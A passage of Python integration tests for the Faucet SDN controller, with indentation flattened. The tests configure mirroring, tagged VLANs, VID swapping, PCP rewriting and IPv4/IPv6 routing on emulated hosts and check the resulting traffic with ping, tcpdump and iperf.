ping_pairs, mirror_host, both_mirrored=True)
class FaucetUntaggedMultiMirrorSepTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
unicast_flood: False
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
%(port_2)d:
native_vlan: 100
%(port_3)d:
mirror: %(port_1)d
%(port_4)d:
mirror: %(port_1)d
"""
def test_untagged(self):
self.flap_all_switch_ports()
# Make sure the two hosts both mirror from port 1
first_host, second_host = self.hosts_name_ordered()[0:2]
mirror_host = self.hosts_name_ordered()[2]
self.verify_ping_mirrored(first_host, second_host, mirror_host)
mirror_host = self.hosts_name_ordered()[3]
self.verify_ping_mirrored(first_host, second_host, mirror_host)
class FaucetTaggedTest(FaucetTest):
N_UNTAGGED = 0
N_TAGGED = 4
LINKS_PER_HOST = 1
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
"""
CONFIG = CONFIG_TAGGED_BOILER
def setUp(self): # pylint: disable=invalid-name
super(FaucetTaggedTest, self).setUp()
self.topo = self.topo_class(
self.OVS_TYPE, self.ports_sock, self._test_name(), [self.dpid],
n_tagged=4, links_per_host=self.LINKS_PER_HOST,
hw_dpid=self.hw_dpid)
self.start_net()
def test_tagged(self):
# Untagged traffic specifically dropped.
for host in self.hosts_name_ordered():
host.cmd(self.scapy_dhcp(host.MAC(), host.intf_root_name, count=3))
for port in self.port_map.values():
self.wait_nonzero_packet_count_flow(
{'in_port': port, 'vlan_tci': '0x0000/0x1fff'}, table_id=self._VLAN_TABLE)
self.ping_all_when_learned()
class FaucetTaggedDTPTest(FaucetTaggedTest):
def test_tagged(self):
for host in self.hosts_name_ordered():
scapy_txt = host.cmd(
('python3 -c \"import sys ; from scapy.contrib.dtp import * ;'
'negotiate_trunk(iface=\'%s\')\"' % host.intf_root_name))
self.assertTrue(re.search('Sent 1 packets', scapy_txt), msg=scapy_txt)
super(FaucetTaggedDTPTest, self).test_tagged()
class FaucetTaggedMirrorTest(FaucetTaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
"""
CONFIG = """
interfaces:
%(port_1)d:
tagged_vlans: [100]
%(port_2)d:
tagged_vlans: [100]
%(port_3)d:
# port 3 will mirror port 1
mirror: %(port_1)d
%(port_4)d:
tagged_vlans: [100]
"""
def test_tagged(self):
first_host, second_host, mirror_host = self.hosts_name_ordered()[0:3]
self.flap_all_switch_ports()
self.verify_ping_mirrored(first_host, second_host, mirror_host)
self.verify_bcast_ping_mirrored(first_host, second_host, mirror_host)
first_host_ip = ipaddress.ip_address(first_host.IP())
second_host_ip = ipaddress.ip_address(second_host.IP())
self.verify_iperf_min(
((first_host, self.port_map['port_1']),
(second_host, self.port_map['port_2'])),
MIN_MBPS, first_host_ip, second_host_ip,
sync_counters_func=lambda: self.one_ipv4_ping(first_host, second_host_ip))
class FaucetTaggedVLANPCPTest(FaucetTaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
acls:
1:
- rule:
vlan_vid: 100
vlan_pcp: 1
actions:
output:
set_fields:
- vlan_pcp: 2
allow: 1
- rule:
actions:
allow: 1
"""
CONFIG = """
interfaces:
%(port_1)d:
tagged_vlans: [100]
acl_in: 1
%(port_2)d:
tagged_vlans: [100]
%(port_3)d:
tagged_vlans: [100]
%(port_4)d:
tagged_vlans: [100]
"""
def test_tagged(self):
first_host, second_host = self.hosts_name_ordered()[:2]
self.quiet_commands(
first_host,
['ip link set %s type vlan egress %u:1' % (
first_host.defaultIntf(), i) for i in range(0, 8)])
self.one_ipv4_ping(first_host, second_host.IP())
self.wait_nonzero_packet_count_flow(
{'vlan_vid': 100, 'vlan_pcp': 1}, table_id=self._PORT_ACL_TABLE)
tcpdump_filter = 'ether dst %s' % second_host.MAC()
tcpdump_txt = self.tcpdump_helper(
second_host, tcpdump_filter, [
lambda: first_host.cmd(
'ping -c3 %s' % second_host.IP())], root_intf=True, packets=1)
self.assertTrue(re.search('vlan 100, p 2,', tcpdump_txt))
class FaucetTaggedVLANPCPOrderedTest(FaucetTaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
acls:
1:
- rule:
vlan_vid: 100
vlan_pcp: 1
actions:
output:
- set_fields:
- vlan_pcp: 2
allow: 1
- rule:
actions:
allow: 1
"""
CONFIG = """
interfaces:
%(port_1)d:
tagged_vlans: [100]
acl_in: 1
%(port_2)d:
tagged_vlans: [100]
%(port_3)d:
tagged_vlans: [100]
%(port_4)d:
tagged_vlans: [100]
"""
def test_tagged(self):
first_host, second_host = self.hosts_name_ordered()[:2]
self.quiet_commands(
first_host,
['ip link set %s type vlan egress %u:1' % (
first_host.defaultIntf(), i) for i in range(0, 8)])
self.one_ipv4_ping(first_host, second_host.IP())
self.wait_nonzero_packet_count_flow(
{'vlan_vid': 100, 'vlan_pcp': 1}, table_id=self._PORT_ACL_TABLE)
tcpdump_filter = 'ether dst %s' % second_host.MAC()
tcpdump_txt = self.tcpdump_helper(
second_host, tcpdump_filter, [
lambda: first_host.cmd(
'ping -c3 %s' % second_host.IP())], root_intf=True, packets=1)
self.assertTrue(re.search('vlan 100, p 2,', tcpdump_txt))
class FaucetTaggedGlobalIPv4RouteTest(FaucetTaggedTest):
def _vids(): # pylint: disable=no-method-argument,no-self-use
return list(range(100, 148))
def global_vid(): # pylint: disable=no-method-argument,no-self-use
return 2047
IPV = 4
NETPREFIX = 24
ETH_TYPE = IPV4_ETH
NETNS = True
VIDS = _vids()
GLOBAL_VID = global_vid()
STR_VIDS = [str(i) for i in _vids()]
NEW_VIDS = VIDS[1:]
@staticmethod
def netbase(vid, host):
return ipaddress.ip_interface('192.168.%u.%u' % (vid, host))
def fping(self, macvlan_int, ipg):
return 'fping %s -c1 -t1 -I%s %s > /dev/null 2> /dev/null' % (
self.FPING_ARGS_SHORT, macvlan_int, ipg)
def fib_table(self):
return self._IPV4_FIB_TABLE
def macvlan_ping(self, host, ipa, macvlan_int):
return self.one_ipv4_ping(host, ipa, intf=macvlan_int)
def run_ip(self, args):
return 'ip -%u %s' % (self.IPV, args)
CONFIG_GLOBAL = """
routers:
global:
vlans: [%s]
vlans:
%s
""" % (
','.join(STR_VIDS),
'\n'.join(['\n'.join(
(' %u:',
' description: "tagged"',
' faucet_vips: ["192.168.%u.254/24"]')) % (i, i) for i in VIDS]))
CONFIG = """
global_vlan: %u
proactive_learn_v4: True
max_wildcard_table_size: 1024
table_sizes:
vlan: %u
vip: %u
flood: %u
interfaces:
%s:
mirror: %s
%s:
native_vlan: 99
tagged_vlans: [%s]
hairpin_unicast: True
%s:
native_vlan: 99
tagged_vlans: [%s]
hairpin_unicast: True
""" % (global_vid(),
len(STR_VIDS) * 3, # VLAN
len(STR_VIDS) * 2, # VIP
len(STR_VIDS) * 12, # Flood
'%(port_3)d', '%(port_1)d', '%(port_1)d',
','.join(STR_VIDS), '%(port_2)d', ','.join(STR_VIDS))
def configure_mesh(self, first_host, second_host):
hosts = (first_host, second_host)
required_ipds = set()
ipd_to_macvlan = {}
for i, host in enumerate(hosts, start=1):
setup_commands = []
for vid in self.NEW_VIDS:
vlan_int = '%s.%u' % (host.intf_root_name, vid)
macvlan_int = 'macvlan%u' % vid
ipa = self.netbase(vid, i)
ipg = self.netbase(vid, 254)
ipd = self.netbase(vid, 253)
required_ipds.add(str(ipd.ip))
ipd_to_macvlan[str(ipd.ip)] = (macvlan_int, host)
setup_commands.extend([
self.run_ip('link add link %s name %s type vlan id %u' % (
host.intf_root_name, vlan_int, vid)),
self.run_ip('link set dev %s up' % vlan_int),
self.run_ip('link add %s link %s type macvlan mode vepa' % (macvlan_int, vlan_int)),
self.run_ip('link set dev %s up' % macvlan_int),
self.run_ip('address add %s/%u dev %s' % (ipa.ip, self.NETPREFIX, macvlan_int)),
self.run_ip('route add default via %s table %u' % (ipg.ip, vid)),
self.run_ip('rule add from %s table %u priority 100' % (ipa, vid)),
# stimulate learning attempts for down host.
self.run_ip('neigh add %s lladdr %s dev %s' % (ipd.ip, self.FAUCET_MAC, macvlan_int))])
# next host routes via FAUCET for other host in same connected subnet
# to cause routing to be exercised.
for j, _ in enumerate(hosts, start=1):
if j != i:
other_ip = self.netbase(vid, j)
setup_commands.append(
self.run_ip('route add %s via %s table %u' % (other_ip, ipg.ip, vid)))
for ipa in (ipg.ip, ipd.ip):
setup_commands.append(self.fping(macvlan_int, ipa))
self.quiet_commands(host, setup_commands)
return required_ipds, ipd_to_macvlan
def verify_drop_rules(self, required_ipds, ipd_to_macvlan):
for _ in range(10):
if not required_ipds:
break
drop_rules = self.get_matching_flows_on_dpid(
self.dpid, {'dl_type': self.ETH_TYPE, 'dl_vlan': str(self.GLOBAL_VID)},
table_id=self.fib_table(), actions=[])
if drop_rules:
for drop_rule in drop_rules:
match = drop_rule['match']
del match['dl_type']
del match['dl_vlan']
self.assertEqual(1, len(match))
ipd = list(match.values())[0].split('/')[0]
if ipd in required_ipds:
required_ipds.remove(ipd)
for ipd in required_ipds:
macvlan_int, host = ipd_to_macvlan[ipd]
host.cmd(self.fping(macvlan_int, ipd))
time.sleep(1)
self.assertFalse(required_ipds, msg='no drop rules for %s' % required_ipds)
def verify_routing_performance(self, first_host, second_host):
for first_host_ip, second_host_ip in (
(self.netbase(self.NEW_VIDS[0], 1), self.netbase(self.NEW_VIDS[0], 2)),
(self.netbase(self.NEW_VIDS[0], 1), self.netbase(self.NEW_VIDS[-1], 2)),
(self.netbase(self.NEW_VIDS[-1], 1), self.netbase(self.NEW_VIDS[0], 2))):
self.verify_iperf_min(
((first_host, self.port_map['port_1']),
(second_host, self.port_map['port_2'])),
MIN_MBPS, first_host_ip.ip, second_host_ip.ip,
sync_counters_func=lambda: self.scapy_bcast(first_host))
def verify_l3_mesh(self, first_host, second_host):
for vid in self.NEW_VIDS:
macvlan_int = 'macvlan%u' % vid
first_host_ip = self.netbase(vid, 1)
second_host_ip = self.netbase(vid, 2)
self.macvlan_ping(first_host, second_host_ip.ip, macvlan_int)
self.macvlan_ping(second_host, first_host_ip.ip, macvlan_int)
def verify_l3_hairpin(self, first_host):
macvlan1_int = 'macvlan%u' % self.NEW_VIDS[0]
macvlan2_int = 'macvlan%u' % self.NEW_VIDS[1]
macvlan2_ip = self.netbase(self.NEW_VIDS[1], 1)
macvlan1_gw = self.netbase(self.NEW_VIDS[0], 254)
macvlan2_gw = self.netbase(self.NEW_VIDS[1], 254)
netns = self.hostns(first_host)
setup_cmds = []
setup_cmds.extend(
[self.run_ip('link set %s netns %s' % (macvlan2_int, netns))])
for exec_cmd in (
(self.run_ip('address add %s/%u dev %s' % (macvlan2_ip.ip, self.NETPREFIX, macvlan2_int)),
self.run_ip('link set %s up' % macvlan2_int),
self.run_ip('route add default via %s' % macvlan2_gw.ip))):
setup_cmds.append('ip netns exec %s %s' % (netns, exec_cmd))
setup_cmds.append(
self.run_ip('route add %s via %s' % (macvlan2_ip, macvlan1_gw.ip)))
self.quiet_commands(first_host, setup_cmds)
self.macvlan_ping(first_host, macvlan2_ip.ip, macvlan1_int)
def test_tagged(self):
first_host, second_host, mirror_host = self.hosts_name_ordered()[:3]
required_ipds, ipd_to_macvlan = self.configure_mesh(first_host, second_host)
self.verify_drop_rules(required_ipds, ipd_to_macvlan)
self.verify_routing_performance(first_host, second_host)
self.verify_l3_mesh(first_host, second_host)
self.verify_l3_hairpin(first_host)
self.verify_ping_mirrored(first_host, second_host, mirror_host)
self.verify_bcast_ping_mirrored(first_host, second_host, mirror_host)
class FaucetTaggedGlobalIPv6RouteTest(FaucetTaggedGlobalIPv4RouteTest):
IPV = 6
NETPREFIX = 112
ETH_TYPE = IPV6_ETH
def _vids(): # pylint: disable=no-method-argument,no-self-use
return list(range(100, 103))
def global_vid(): # pylint: disable=no-method-argument,no-self-use
return 2047
VIDS = _vids()
GLOBAL_VID = global_vid()
STR_VIDS = [str(i) for i in _vids()]
NEW_VIDS = VIDS[1:]
def netbase(self, vid, host):
return ipaddress.ip_interface('fc00::%u:%u' % (vid, host))
def fib_table(self):
return self._IPV6_FIB_TABLE
def fping(self, macvlan_int, ipg):
return 'fping6 %s -c1 -t1 -I%s %s > /dev/null 2> /dev/null' % (
self.FPING_ARGS_SHORT, macvlan_int, ipg)
def macvlan_ping(self, host, ipa, macvlan_int):
return self.one_ipv6_ping(host, ipa, intf=macvlan_int)
def run_ip(self, args):
return 'ip -%u %s' % (self.IPV, args)
CONFIG_GLOBAL = """
routers:
global:
vlans: [%s]
vlans:
%s
""" % (
','.join(STR_VIDS),
'\n'.join(['\n'.join(
(' %u:',
' description: "tagged"',
' faucet_vips: ["fc00::%u:254/112"]')) % (i, i) for i in VIDS]))
CONFIG = """
global_vlan: %u
proactive_learn_v6: True
max_wildcard_table_size: 512
table_sizes:
vlan: 256
vip: 128
flood: 384
interfaces:
%s:
mirror: %s
%s:
native_vlan: 99
tagged_vlans: [%s]
hairpin_unicast: True
%s:
native_vlan: 99
tagged_vlans: [%s]
hairpin_unicast: True
""" % (global_vid(), '%(port_3)d', '%(port_1)d', '%(port_1)d',
','.join(STR_VIDS), '%(port_2)d', ','.join(STR_VIDS))
class FaucetTaggedScaleTest(FaucetTaggedTest):
def _vids(): # pylint: disable=no-method-argument,no-self-use
return list(range(100, 148))
VIDS = _vids()
STR_VIDS = [str(i) for i in _vids()]
NEW_VIDS = VIDS[1:]
CONFIG_GLOBAL = """
vlans:
""" + '\n'.join(['\n'.join(
(' %u:',
' description: "tagged"')) % i for i in VIDS])
CONFIG = """
interfaces:
%s:
tagged_vlans: [%s]
%s:
tagged_vlans: [%s]
%s:
tagged_vlans: [%s]
%s:
tagged_vlans: [%s]
""" % ('%(port_1)d', ','.join(STR_VIDS),
'%(port_2)d', ','.join(STR_VIDS),
'%(port_3)d', ','.join(STR_VIDS),
'%(port_4)d', ','.join(STR_VIDS))
def test_tagged(self):
self.ping_all_when_learned()
for host in self.hosts_name_ordered():
setup_commands = []
for vid in self.NEW_VIDS:
vlan_int = '%s.%u' % (host.intf_root_name, vid)
setup_commands.extend([
'ip link add link %s name %s type vlan id %u' % (
host.intf_root_name, vlan_int, vid),
'ip link set dev %s up' % vlan_int])
self.quiet_commands(host, setup_commands)
for host in self.hosts_name_ordered():
rdisc6_commands = []
for vid in self.NEW_VIDS:
vlan_int = '%s.%u' % (host.intf_root_name, vid)
rdisc6_commands.append(
'rdisc6 -r2 -w1 -q %s 2> /dev/null' % vlan_int)
self.quiet_commands(host, rdisc6_commands)
for vlan in self.NEW_VIDS:
vlan_int = '%s.%u' % (host.intf_root_name, vid)
for _ in range(3):
for host in self.hosts_name_ordered():
self.quiet_commands(
host,
['rdisc6 -r2 -w1 -q %s 2> /dev/null' % vlan_int])
vlan_hosts_learned = self.scrape_prometheus_var(
'vlan_hosts_learned', {'vlan': str(vlan)})
if vlan_hosts_learned == len(self.hosts_name_ordered()):
break
time.sleep(1)
self.assertGreater(
vlan_hosts_learned, 1,
msg='not all VLAN %u hosts learned (%u)' % (vlan, vlan_hosts_learned))
class FaucetTaggedBroadcastTest(FaucetTaggedTest):
def test_tagged(self):
super(FaucetTaggedBroadcastTest, self).test_tagged()
self.verify_broadcast()
self.verify_no_bcast_to_self()
class FaucetTaggedExtLoopProtectTest(FaucetTaggedTest):
CONFIG = """
interfaces:
%(port_1)d:
tagged_vlans: [100]
loop_protect_external: True
%(port_2)d:
tagged_vlans: [100]
loop_protect_external: True
%(port_3)d:
tagged_vlans: [100]
%(port_4)d:
tagged_vlans: [100]
"""
def test_tagged(self):
ext_port1, ext_port2, int_port1, int_port2 = self.hosts_name_ordered()
self.verify_broadcast((ext_port1, ext_port2), False)
self.verify_broadcast((int_port1, int_port2), True)
self.verify_unicast((int_port1, int_port2), True)
class FaucetTaggedWithUntaggedTest(FaucetTaggedTest):
N_UNTAGGED = 0
N_TAGGED = 4
LINKS_PER_HOST = 1
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
200:
description: "untagged"
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 200
tagged_vlans: [100]
%(port_2)d:
native_vlan: 200
tagged_vlans: [100]
%(port_3)d:
native_vlan: 200
tagged_vlans: [100]
%(port_4)d:
native_vlan: 200
tagged_vlans: [100]
"""
def test_tagged(self):
self.ping_all_when_learned()
native_ips = [
ipaddress.ip_interface('10.99.99.%u/24' % (i + 1)) for i in range(len(self.hosts_name_ordered()))]
for native_ip, host in zip(native_ips, self.hosts_name_ordered()):
self.host_ipv4_alias(host, native_ip, intf=host.intf_root_name)
for own_native_ip, host in zip(native_ips, self.hosts_name_ordered()):
for native_ip in native_ips:
if native_ip != own_native_ip:
self.one_ipv4_ping(host, native_ip.ip, intf=host.intf_root_name)
class FaucetTaggedSwapVidMirrorTest(FaucetTaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
101:
description: "tagged"
acls:
1:
- rule:
vlan_vid: 100
actions:
mirror: %(port_3)d
force_port_vlan: 1
output:
swap_vid: 101
allow: 1
"""
CONFIG = """
interfaces:
%(port_1)d:
tagged_vlans: [100]
acl_in: 1
%(port_2)d:
tagged_vlans: [101]
%(port_3)d:
tagged_vlans: [100]
%(port_4)d:
tagged_vlans: [100]
"""
def test_tagged(self):
first_host, second_host, third_host = self.hosts_name_ordered()[:3]
def test_acl(tcpdump_host, tcpdump_filter):
tcpdump_txt = self.tcpdump_helper(
tcpdump_host, tcpdump_filter, [
lambda: first_host.cmd(
'arp -s %s %s' % (second_host.IP(), '01:02:03:04:05:06')),
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))],
root_intf=True)
self.assertTrue(re.search(
'%s: ICMP echo request' % second_host.IP(), tcpdump_txt))
self.assertTrue(re.search(
tcpdump_filter, tcpdump_txt))
# Saw swapped VID on second host
test_acl(second_host, 'vlan 101')
# Saw original VID on mirror host
test_acl(third_host, 'vlan 100')
class FaucetTaggedOrderedSwapVidMirrorTest(FaucetTaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
101:
description: "tagged"
acls:
1:
- rule:
vlan_vid: 100
actions:
mirror: %(port_3)d
force_port_vlan: 1
output:
- swap_vid: 101
allow: 1
"""
CONFIG = """
interfaces:
%(port_1)d:
tagged_vlans: [100]
acl_in: 1
%(port_2)d:
tagged_vlans: [101]
%(port_3)d:
tagged_vlans: [100]
%(port_4)d:
tagged_vlans: [100]
"""
def test_tagged(self):
first_host, second_host, third_host = self.hosts_name_ordered()[:3]
def test_acl(tcpdump_host, tcpdump_filter):
tcpdump_txt = self.tcpdump_helper(
tcpdump_host, tcpdump_filter, [
lambda: first_host.cmd(
'arp -s %s %s' % (second_host.IP(), '01:02:03:04:05:06')),
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))],
root_intf=True)
self.assertTrue(re.search(
'%s: ICMP echo request' % second_host.IP(), tcpdump_txt))
self.assertTrue(re.search(
tcpdump_filter, tcpdump_txt))
# Saw swapped VID on second host
test_acl(second_host, 'vlan 101')
# Saw original VID on mirror host
test_acl(third_host, 'vlan 100')
class FaucetTaggedSwapVidOutputTest(FaucetTaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
unicast_flood: False
101:
description: "tagged"
unicast_flood: False
acls:
1:
- rule:
vlan_vid: 100
actions:
output:
swap_vid: 101
port: %(port_2)d
"""
CONFIG = """
interfaces:
%(port_1)d:
tagged_vlans: [100]
acl_in: 1
%(port_2)d:
tagged_vlans: [101]
%(port_3)d:
tagged_vlans: [100]
%(port_4)d:
tagged_vlans: [100]
"""
def test_tagged(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
# we expected to see the swapped VLAN VID
tcpdump_filter = 'vlan 101'
tcpdump_txt = self.tcpdump_helper(
second_host, tcpdump_filter, [
lambda: first_host.cmd(
'arp -s %s %s' % (second_host.IP(), '01:02:03:04:05:06')),
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))],
root_intf=True)
self.assertTrue(re.search(
'%s: ICMP echo request' % second_host.IP(), tcpdump_txt))
self.assertTrue(re.search(
'vlan 101', tcpdump_txt))
class FaucetTaggedSwapVidOrderedOutputTest(FaucetTaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
unicast_flood: False
101:
description: "tagged"
unicast_flood: False
acls:
1:
- rule:
vlan_vid: 100
actions:
output:
- swap_vid: 101
- port: %(port_2)d
"""
CONFIG = """
interfaces:
%(port_1)d:
tagged_vlans: [100]
acl_in: 1
%(port_2)d:
tagged_vlans: [101]
%(port_3)d:
tagged_vlans: [100]
%(port_4)d:
tagged_vlans: [100]
"""
def test_tagged(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
# we expected to see the swapped VLAN VID
tcpdump_filter = 'vlan 101'
tcpdump_txt = self.tcpdump_helper(
second_host, tcpdump_filter, [
lambda: first_host.cmd(
'arp -s %s %s' % (second_host.IP(), '01:02:03:04:05:06')),
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))],
root_intf=True)
self.assertTrue(re.search(
'%s: ICMP echo request' % second_host.IP(), tcpdump_txt))
self.assertTrue(re.search(
'vlan 101', tcpdump_txt))
class FaucetTaggedPopVlansOutputTest(FaucetTaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
unicast_flood: False
acls:
1:
- rule:
vlan_vid: 100
dl_dst: "01:02:03:04:05:06"
actions:
output:
set_fields:
- eth_dst: "06:06:06:06:06:06"
pop_vlans: 1
port: %(port_2)d
"""
CONFIG = """
interfaces:
%(port_1)d:
tagged_vlans: [100]
acl_in: 1
%(port_2)d:
tagged_vlans: [100]
%(port_3)d:
tagged_vlans: [100]
%(port_4)d:
tagged_vlans: [100]
"""
def test_tagged(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
tcpdump_filter = 'not vlan and icmp and ether dst 06:06:06:06:06:06'
tcpdump_txt = self.tcpdump_helper(
second_host, tcpdump_filter, [
lambda: first_host.cmd(
'arp -s %s %s' % (second_host.IP(), '01:02:03:04:05:06')),
lambda: first_host.cmd(
' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))],
packets=10, root_intf=True)
self.assertTrue(re.search(
'%s: ICMP echo request' % second_host.IP(), tcpdump_txt))
class FaucetTaggedPopVlansOrderedOutputTest(FaucetTaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
unicast_flood: False
acls:
1:
- rule:
vlan_vid: 100
dl_dst: "01:02:03:04:05:06"
actions:
output:
- set_fields:
- eth_dst: "06:06:06:06:06:06"
- pop_vlans: 1
- port: %(port_2)d
"""
CONFIG = """
interfaces:
%(port_1)d:
tagged_vlans: [100]
acl_in: 1
%(port_2)d:
tagged_vlans: [100]
%(port_3)d:
tagged_vlans: [100]
%(port_4)d:
tagged_vlans: [100]
"""
def test_tagged(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
tcpdump_filter = 'not vlan and icmp and ether dst 06:06:06:06:06:06'
tcpdump_txt = self.tcpdump_helper(
second_host, tcpdump_filter, [
lambda: first_host.cmd(
'arp -s %s %s' % (second_host.IP(), '01:02:03:04:05:06')),
lambda: first_host.cmd(
' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))],
packets=10, root_intf=True)
self.assertTrue(re.search(
'%s: ICMP echo request' % second_host.IP(), tcpdump_txt))
class FaucetTaggedIPv4ControlPlaneTest(FaucetTaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
faucet_vips: ["10.0.0.254/24"]
"""
CONFIG = """
max_resolve_backoff_time: 1
""" + CONFIG_TAGGED_BOILER
def test_ping_controller(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
self.one_ipv4_ping(first_host, second_host.IP())
for host in first_host, second_host:
self.one_ipv4_controller_ping(host)
class FaucetTaggedIPv6ControlPlaneTest(FaucetTaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
faucet_vips: ["fc00::1:254/112"]
"""
CONFIG = """
max_resolve_backoff_time: 1
""" + CONFIG_TAGGED_BOILER
def test_ping_controller(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
self.add_host_ipv6_address(first_host, 'fc00::1:1/112')
self.add_host_ipv6_address(second_host, 'fc00::1:2/112')
self.one_ipv6_ping(first_host, 'fc00::1:2')
for host in first_host, second_host:
self.one_ipv6_controller_ping(host)
class FaucetTaggedICMPv6ACLTest(FaucetTaggedTest):
CONFIG_GLOBAL = """
acls:
1:
- rule:
dl_type: %u
vlan_vid: 100
ip_proto: 58
icmpv6_type: 135
ipv6_nd_target: "fc00::1:2"
actions:
output:
port: %s
- rule:
actions:
allow: 1
vlans:
100:
description: "tagged"
faucet_vips: ["fc00::1:254/112"]
""" % (IPV6_ETH, '%(port_2)d')
CONFIG = """
max_resolve_backoff_time: 1
interfaces:
%(port_1)d:
tagged_vlans: [100]
acl_in: 1
%(port_2)d:
tagged_vlans: [100]
%(port_3)d:
tagged_vlans: [100]
%(port_4)d:
tagged_vlans: [100]
"""
def test_icmpv6_acl_match(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
self.add_host_ipv6_address(first_host, 'fc00::1:1/112')
self.add_host_ipv6_address(second_host, 'fc00::1:2/112')
self.one_ipv6_ping(first_host, 'fc00::1:2')
self.wait_nonzero_packet_count_flow(
{'dl_type': IPV6_ETH, 'ip_proto': 58, 'icmpv6_type': 135,
'ipv6_nd_target': 'fc00::1:2'}, table_id=self._PORT_ACL_TABLE)
class FaucetTaggedICMPv6OrderedACLTest(FaucetTaggedTest):
CONFIG_GLOBAL = """
acls:
1:
- rule:
dl_type: %u
vlan_vid: 100
ip_proto: 58
icmpv6_type: 135
ipv6_nd_target: "fc00::1:2"
actions:
output:
- port: %s
- rule:
actions:
allow: 1
vlans:
100:
description: "tagged"
faucet_vips: ["fc00::1:254/112"]
""" % (IPV6_ETH, '%(port_2)d')
CONFIG = """
max_resolve_backoff_time: 1
interfaces:
%(port_1)d:
tagged_vlans: [100]
acl_in: 1
%(port_2)d:
tagged_vlans: [100]
%(port_3)d:
tagged_vlans: [100]
%(port_4)d:
tagged_vlans: [100]
"""
def test_icmpv6_acl_match(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
self.add_host_ipv6_address(first_host, 'fc00::1:1/112')
self.add_host_ipv6_address(second_host, 'fc00::1:2/112')
self.one_ipv6_ping(first_host, 'fc00::1:2')
self.wait_nonzero_packet_count_flow(
{'dl_type': IPV6_ETH, 'ip_proto': 58, 'icmpv6_type': 135,
'ipv6_nd_target': 'fc00::1:2'}, table_id=self._PORT_ACL_TABLE)
class FaucetTaggedIPv4RouteTest(FaucetTaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
faucet_vips: ["10.0.0.254/24"]
routes:
- route:
ip_dst: "10.0.1.0/24"
ip_gw: "10.0.0.1"
- route:
ip_dst: "10.0.2.0/24"
ip_gw: "10.0.0.2"
- route:
ip_dst: "10.0.3.0/24"
ip_gw: "10.0.0.2"
200:
description: "not used"
300:
description: "not used"
"""
CONFIG = """
arp_neighbor_timeout: 2
max_resolve_backoff_time: 1
interfaces:
%(port_1)d:
tagged_vlans: [100]
%(port_2)d:
tagged_vlans: [100]
%(port_3)d:
tagged_vlans: [100]
%(port_4)d:
native_vlan: 200
"""
def test_tagged(self):
self._enable_event_log()
host_pair = self.hosts_name_ordered()[:2]
first_host, second_host = host_pair
first_host_routed_ip = ipaddress.ip_interface('10.0.1.1/24')
second_host_routed_ip = ipaddress.ip_interface('10.0.2.1/24')
for _coldstart in range(2):
for _swaps in range(3):
self.verify_ipv4_routing(
first_host, first_host_routed_ip,
second_host, second_host_routed_ip)
self.swap_host_macs(first_host, second_host)
self.coldstart_conf()
# change of a VLAN/ports not involved in routing, should be a warm start.
for vid in (300, 200):
self.change_port_config(
self.port_map['port_4'], 'native_vlan', vid,
restart=True, cold_start=False)
self.wait_until_matching_lines_from_file(
r'.+L3_LEARN.+10.0.0.[12].+', self.event_log)
class FaucetTaggedTargetedResolutionIPv4RouteTest(FaucetTaggedIPv4RouteTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
faucet_vips: ["10.0.0.254/24"]
targeted_gw_resolution: True
routes:
- route:
ip_dst: "10.0.1.0/24"
ip_gw: "10.0.0.1"
- route:
ip_dst: "10.0.2.0/24"
ip_gw: "10.0.0.2"
- route:
ip_dst: "10.0.3.0/24"
ip_gw: "10.0.0.2"
"""
class FaucetTaggedProactiveNeighborIPv4RouteTest(FaucetTaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
faucet_vips: ["10.0.0.254/24"]
"""
CONFIG = """
nd_neighbor_timeout: 2
max_resolve_backoff_time: 1
proactive_learn_v4: True
""" + CONFIG_TAGGED_BOILER
def test_tagged(self):
host_pair = self.hosts_name_ordered()[:2]
first_host, second_host = host_pair
first_host_alias_ip = ipaddress.ip_interface('10.0.0.99/24')
first_host_alias_host_ip = ipaddress.ip_interface(
ipaddress.ip_network(first_host_alias_ip.ip))
self.host_ipv4_alias(first_host, first_host_alias_ip)
self.add_host_route(second_host, first_host_alias_host_ip, self.FAUCET_VIPV4.ip)
self.one_ipv4_ping(second_host, first_host_alias_ip.ip)
self.assertGreater(
self.scrape_prometheus_var(
'vlan_neighbors', {'ipv': '4', 'vlan': '100'}),
1)
class FaucetTaggedProactiveNeighborIPv6RouteTest(FaucetTaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
faucet_vips: ["fc00::1:3/64"]
"""
CONFIG = """
nd_neighbor_timeout: 2
max_resolve_backoff_time: 1
proactive_learn_v6: True
""" + CONFIG_TAGGED_BOILER
def test_tagged(self):
host_pair = self.hosts_name_ordered()[:2]
